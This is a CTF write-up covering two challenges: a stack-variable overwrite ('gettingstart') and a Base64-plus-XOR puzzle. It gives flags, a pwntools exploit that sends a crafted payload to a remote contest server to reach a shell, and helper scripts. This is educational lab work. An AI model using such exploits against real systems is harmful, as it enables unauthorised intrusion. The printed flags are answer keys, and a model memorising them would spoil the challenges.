护网临时工
pwn
gettingstart
flag{4281a86e5b9ab0ae7940f38be574dc52}
IDA decompilation shows that system("bin/sh") is executed when 0x7FFFFFFFFFFFFFFFLL == v7 && 0.1 == v8.
read(0, &buf, 0x28uLL) reads in 0x28 bytes, which overwrite buf, v5, v6, v7 and v8 in that order. v5 and v6 can be anything; v7 gets 0x7FFFFFFFFFFFFFFF. v8 is the double 0.1: write a small C program that assigns 0.1 to a double, use GDB to read the in-memory representation of that double, 0x3fb999999999999a, and write that in.
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# io = process("./task_gettingStart_ktQeERc")
io = remote("49.4.78.170", 31070)
# 24 filler bytes cover buf, v5 and v6; the next two qwords land in v7 and v8.
# p64() returns bytes, so the filler must be bytes too under Python 3.
payload1 = b'a' * 24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3fb999999999999a)
print("--------------")
print(p64(0x7FFFFFFFFFFFFFFF))
print(p64(0x3fb999999999999a))
print("--------------")
io.recvuntil(b"you.\n")
io.sendline(payload1)
io.interactive()
io.close()
```
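The writeup obtains the bit pattern of 0.1 by compiling a C program and inspecting it in GDB. The following added example (not from the original writeup) derives the same value directly with Python's struct module, and then parses a 40-byte image the way the five 8-byte locals described above would see it, so the v7/v8 comparison can be checked before anything is sent. The field order buf, v5, v6, v7, v8 and the 24-byte filler are assumptions taken from the writeup's description; the comparison logic mirrors the decompiled condition it quotes.

```python
import struct

# Assumed layout from the writeup: read(0, &buf, 0x28) fills 40 bytes that cover
# buf, v5, v6, v7 and v8, each 8 bytes, in that order (assumption, not verified here).
FIELDS = ("buf", "v5", "v6", "v7", "v8")
IMAGE_LEN = 0x28
V7_EXPECTED = 0x7FFFFFFFFFFFFFFF
V8_EXPECTED = 0.1


def double_to_u64(x: float) -> int:
    """Bit pattern of a binary64 double as a little-endian 64-bit process stores it."""
    return struct.unpack("<Q", struct.pack("<d", x))[0]


def u64_to_double(bits: int) -> float:
    """Inverse of double_to_u64: reinterpret a 64-bit pattern as a double."""
    return struct.unpack("<d", struct.pack("<Q", bits))[0]


def parse_locals(image: bytes) -> dict:
    """Interpret a 0x28-byte image as the five qword locals; v8 is read back as a double."""
    if len(image) != IMAGE_LEN:
        raise ValueError("expected exactly 0x28 bytes, got %d" % len(image))
    words = struct.unpack("<5Q", image)
    loc = dict(zip(FIELDS, words))
    loc["v8"] = u64_to_double(loc["v8"])
    return loc


def passes_check(image: bytes) -> bool:
    """The same comparison the writeup quotes from the decompiled binary."""
    loc = parse_locals(image)
    return loc["v7"] == V7_EXPECTED and loc["v8"] == V8_EXPECTED


def example_image() -> bytes:
    """Constructed 40-byte image: 24 filler bytes, then v7 and v8 as little-endian qwords."""
    return (b"a" * 24
            + struct.pack("<Q", V7_EXPECTED)
            + struct.pack("<Q", double_to_u64(V8_EXPECTED)))


if __name__ == "__main__":
    print("0.1 as u64: 0x%016x" % double_to_u64(0.1))
    print("locals:", parse_locals(example_image()))
    print("check passes:", passes_check(example_image()))
```

Note that the equality test on v8 is exact: the neighbouring pattern 0x3fb9999999999999 decodes to a double that is not equal to the literal 0.1, which is why the writeup needs the precise bit pattern rather than any value that prints as 0.1.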
misc
Late sign-in challenge
flag{2F64B7656E77E0A0743C02ECAE9E2513}
The garbled text in the txt ends with an equals sign, so it is presumably Base64. After decoding it is still garbled; the hint says xor, so XOR every byte with one value, brute-force that value, and submit whatever in the output looks like a flag.
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
mess = b"AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs="
aft = base64.b64decode(mess)      # raw bytes; XOR them directly instead of decoding as utf8
print(aft)
for i in range(100, 200):         # candidate single-byte keys
    for j in aft:
        print(chr(i ^ j), end='') # XOR every byte with the candidate key
    print()
```
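The script above prints all candidate plaintexts and leaves the reader to spot the flag. As an added example (not part of the original writeup), the code below tries every one of the 256 possible single-byte keys, filters the outputs with a regular expression for the flag{...} shape, and also lists the keys that yield only printable characters, which is the usual heuristic when no flag format is known. The Base64 blob is the one from the writeup; the regex and the printable-ratio heuristic are assumptions about what "looks like a flag".

```python
import base64
import re
import string

# The Base64 blob from the challenge (taken from the writeup above).
CIPHERTEXT_B64 = "AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs="

# Assumed flag shape: flag{ followed by hex digits and a closing brace.
FLAG_RE = re.compile(rb"flag\{[0-9A-Fa-f]+\}")
PRINTABLE = set(string.printable.encode())


def xor_with_key(data: bytes, key: int) -> bytes:
    """XOR every byte of data with one single-byte key."""
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII; 1.0 means every byte is printable."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in PRINTABLE) / len(data)


def printable_keys(data: bytes, min_ratio: float = 1.0) -> list:
    """Keys whose XOR output is at least min_ratio printable (heuristic, may give several hits)."""
    return [k for k in range(256) if printable_ratio(xor_with_key(data, k)) >= min_ratio]


def find_flag(data: bytes):
    """Return (key, flag) for the lowest key whose output matches FLAG_RE, else None."""
    for k in range(256):
        m = FLAG_RE.search(xor_with_key(data, k))
        if m:
            return k, m.group(0).decode()
    return None


def solve(b64: str = CIPHERTEXT_B64):
    """Decode the Base64 layer, then search the single-byte XOR key space."""
    return find_flag(base64.b64decode(b64))


if __name__ == "__main__":
    raw = base64.b64decode(CIPHERTEXT_B64)
    print("fully printable keys:", printable_keys(raw))
    print("flag search:", solve())
```

The printable-only filter is deliberately kept separate from the regex search: several keys can produce all-printable output (flipping a single bit in the key remaps letters to other letters), so the format check is what singles out the real key, 0x66, which is the byte 'f' XORed with the leading 0x00 of the ciphertext.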